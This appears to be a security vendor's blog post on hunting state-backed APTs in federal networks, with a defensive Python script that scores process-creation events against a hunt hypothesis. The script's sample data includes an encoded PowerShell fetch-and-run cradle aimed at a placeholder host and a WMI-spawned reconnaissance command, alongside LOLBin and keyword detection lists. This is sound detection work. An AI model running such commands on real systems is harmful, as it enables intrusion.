In today’s digital age, cyber threats are constantly evolving, and Federal agencies are particularly vulnerable to attacks by State-sponsored advanced persistent threats (APTs). The need for a quick and effective response against these attacks is critical to maintaining national security and protecting our critical infrastructure. 

Hunting for APTs is hard – period. Flush with resources, APTs employ arguably the most sophisticated and evasive tactics, techniques, and procedures (TTPs) to infiltrate and persist within a network. Leveraging highly customized and “low and slow” attack methods, along with advanced evasion techniques, APTs are adept at bypassing detection mechanisms and can persist in victim Agency networks for months or even years. Experts at “Living off the Land” TTPs, that is, abusing legitimate tools already present in the victim’s environment (e.g. PowerShell, WMI, RDP, and other LOLBins), APTs blend in with normal-looking administrative activity, making them especially difficult for security teams to discover: the binary itself is trusted and signed, so the only thing left to catch is the context in which it runs, such as who launched it, from what parent process, with what command line, and at what hour. 

The right team understands these steep challenges and develops a thorough, proactive, and adaptable approach to discover and mitigate evolving cyber attacks from APTs. Using a combination of threat actor research, advanced hypotheses, and comprehensive data analysis, expert threat hunting teams can quickly uncover the threat and respond accordingly. 

Know your target. Critical to an effective threat hunt is understanding the nature and breadth of the target APT’s attack methods. Once a triggering event has occurred, driving the operating assumption that a named APT could be in the victim network, threat hunters immediately begin refining their knowledge of the tools and TTPs that could be in scope. This includes researching published open-source and classified threat intelligence, deep and dark web forums, and security whitepapers. Additionally, sophisticated threat hunters review relevant incident response data and perform malware analysis and reverse engineering to reveal historical attack trends and patterns, as well as the indicators and artifacts that should be expected if the target APT has successfully compromised the victim environment. Combining this data, experienced hunters reconstruct the APT’s kill chain using industry-standard models such as the MITRE ATT&CK framework (to map each observed behavior to a technique) and the Pyramid of Pain (to prioritize the indicators that are costliest for the adversary to change, such as TTPs and tooling, over hashes and IP addresses that can be rotated in minutes), outlining an attack workflow that later guides the threat hunt hypotheses and operations. 

Tailor your hunt using hypotheses. Experienced threat hunters must assume that APTs read the same published intelligence and know the detection methods used to find them; the atomic indicators in a past report (hashes, domains, IP addresses) will likely have been retired, so the adversary will only be discoverable by looking for evidence of their TTPs based on well-crafted hypotheses. A hunt hypothesis is a testable statement that outlines the indicators or artifacts that must be present if the target APT has succeeded in its attack. A strong hunt hypothesis defines the scope of the hunt, including the systems, network segments, or data sources to be analyzed. It should also consider the context of the environment, such as the Agency’s mission and operations, typical user behavior, and relevant security controls in place. Furthermore, the hypothesis should state in advance the criteria or conditions that must be met to confirm or refute it, so that the outcome is not argued after the fact. This could involve thresholds for anomaly detection, correlation with known IOCs, or validation through manual investigation. 

Ensure visibility with the right data. Collecting the right data is essential; without it, threat hunters are blind. For timely threat discovery and response, hunters must rapidly identify and ensure the collection and processing of the variety of data required to test their threat hunt hypotheses. Network traffic logs reveal patterns suggestive of APT activity, including unusual data transfers and command and control communications, while endpoint logs and artifacts (process-creation events with full command lines and parent/child relationships, PowerShell script block logs, scheduled tasks, services, and registry run keys) offer insights into compromised devices and persistence mechanisms, and are where most Living-off-the-Land activity has to be caught. System and application logs complement this by highlighting abnormal user behavior and authentication events. User and Entity Behavior Analytics (UEBA) data aids in identifying insider threats and compromised accounts. Collectively, these data sources empower threat hunters to proactively test their hypotheses and prove or disprove the presence of the targeted APT. A practical check before the hunt starts: confirm that the required telemetry is actually being collected and retained for the in-scope hosts, because a hypothesis that cannot be refuted only because the log source was never enabled is not a negative result. 
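The hypothesis-driven approach described above (a stated scope, environmental context, and confirm/refute criteria agreed in advance) and the endpoint telemetry it depends on can be shown end to end in a small hunt script. The following is an added example written for this page, not Edgewater’s own tooling and not a description of any real hunt: the hypothesis, the business-hours window, the per-host threshold, the lists of LOLBins and Office parent processes, and the four sample process-creation events are all constructed for illustration, and the event fields are assumed to follow Sysmon Event ID 1 / Windows Security 4688 style records.

```python
"""Added example: testing one Living-off-the-Land hunt hypothesis over process-creation telemetry.

Hypothesis H1 (constructed for this example): if the target actor has a foothold on agency
workstations, we expect LOLBins (PowerShell, WMI, cmd) launched from user-facing parents or via
WMI, with hidden/encoded/bypass command lines, clustering on a host and often outside business hours.
Scope: process-creation events from in-scope hosts. Decision rule: H1 is supported for a host when
at least THRESHOLD events on it carry findings; fewer is noise to triage, not a confirmation.
"""
import base64
import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional, Set


@dataclass
class ProcEvent:
    """Fields modelled on Sysmon Event ID 1 / Windows 4688 records (assumption, not a real schema)."""
    ts: datetime
    host: str
    user: str
    parent: str
    image: str
    cmdline: str


LOLBINS = {"powershell.exe", "pwsh.exe", "wmic.exe", "cmd.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
WMI_PROVIDER_HOST = "wmiprvse.exe"
SUSPICIOUS_PS = ("invoke-expression", "iex ", "downloadstring", "frombase64string")
ENC_RE = re.compile(r"-(?:e|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
BUSINESS_HOURS = range(6, 20)  # hypothetical agency working hours
THRESHOLD = 2                  # hypothetical per-host confirmation threshold


def _encode_ps(script: str) -> str:
    """PowerShell -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample events (not real telemetry): a benign admin script, an Office-spawned
# encoded download cradle, a WMI-spawned recon command, and a lone off-hours wmic query.
SAMPLE_EVENTS = [
    ProcEvent(datetime(2024, 3, 4, 9, 12), "WS-0417", "AGENCY\\jdoe", "explorer.exe", "powershell.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"),
    ProcEvent(datetime(2024, 3, 4, 2, 41), "WS-0417", "AGENCY\\jdoe", "WINWORD.EXE", "powershell.exe",
              "powershell.exe -w hidden -ep bypass -enc "
              + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')")),
    ProcEvent(datetime(2024, 3, 4, 2, 43), "WS-0417", "AGENCY\\jdoe", "WmiPrvSE.exe", "cmd.exe",
              r"cmd.exe /c whoami /all > C:\Users\Public\w.txt"),
    ProcEvent(datetime(2024, 3, 4, 21, 30), "WS-0902", "AGENCY\\asmith", "explorer.exe", "wmic.exe",
              "wmic.exe process list brief"),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent or undecodable."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(e: ProcEvent) -> List[str]:
    """Apply H1's criteria to one event; an empty list means the event does not support H1."""
    reasons: List[str] = []
    image, parent, cmd = e.image.lower(), e.parent.lower(), e.cmdline.lower()
    if image not in LOLBINS:
        return reasons
    if parent in OFFICE_PARENTS:
        reasons.append("LOLBin spawned by an Office application")
    if parent == WMI_PROVIDER_HOST:
        reasons.append("process spawned via WMI provider host")
    if re.search(r"-(?:w|windowstyle)\s+hidden", cmd):
        reasons.append("hidden window")
    if re.search(r"-(?:ep|exec|executionpolicy)\s+bypass", cmd):
        reasons.append("execution policy bypass")
    decoded = decode_encoded_command(e.cmdline)
    if decoded is not None:
        reasons.append("encoded command")
        if any(k in decoded.lower() for k in SUSPICIOUS_PS):
            reasons.append("download cradle in decoded command")
    if e.ts.hour not in BUSINESS_HOURS:
        reasons.append("outside business hours")
    return reasons


def run_hunt(events: List[ProcEvent], scope_hosts: Optional[Set[str]] = None,
             threshold: int = THRESHOLD) -> Dict:
    """Group findings per in-scope host and apply the confirm/refute decision rule."""
    findings: Dict[str, List] = defaultdict(list)
    for e in events:
        if scope_hosts is not None and e.host not in scope_hosts:
            continue  # outside the hypothesis scope
        reasons = evaluate(e)
        if reasons:
            findings[e.host].append((e.ts.isoformat(), e.image, reasons))
    confirmed = {h: f for h, f in findings.items() if len(f) >= threshold}
    noise = {h: f for h, f in findings.items() if len(f) < threshold}
    return {"hypothesis_supported": bool(confirmed), "hosts": confirmed, "noise": noise}


if __name__ == "__main__":
    result = run_hunt(SAMPLE_EVENTS)
    print("H1 supported:", result["hypothesis_supported"])
    for host, items in result["hosts"].items():
        for ts, image, reasons in items:
            print(f"  {host} {ts} {image}: {', '.join(reasons)}")
    print("below threshold (triage):", sorted(result["noise"]))
```

Running the script reports the host where two findings cluster (the Office-spawned encoded download cradle and the WMI-spawned recon command), leaves the lone off-hours wmic query in the triage bucket rather than calling it a compromise, and lets the hunter narrow the scope with scope_hosts. In a real hunt the same evaluate function would run over exported EDR or Sysmon data, and the criteria would be tuned to the agency’s own baseline rather than hard-coded.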

At Edgewater, our recent threat hunt activities to discover Midnight Blizzard, a top-tier Russian government-backed APT, demonstrate our capability and agility. Recognizing the need to perform a hypothesis-driven ad hoc threat hunt to find evidence of compromise that may have evaded existing detections, our threat hunt team jumped into action. We understand the importance of a quick response against cyber attacks, and our expert threat hunt team stands ready to defend our Federal agency customers. Contact us to learn more about our approach to threat hunting, and how we can help protect your Federal organization. 
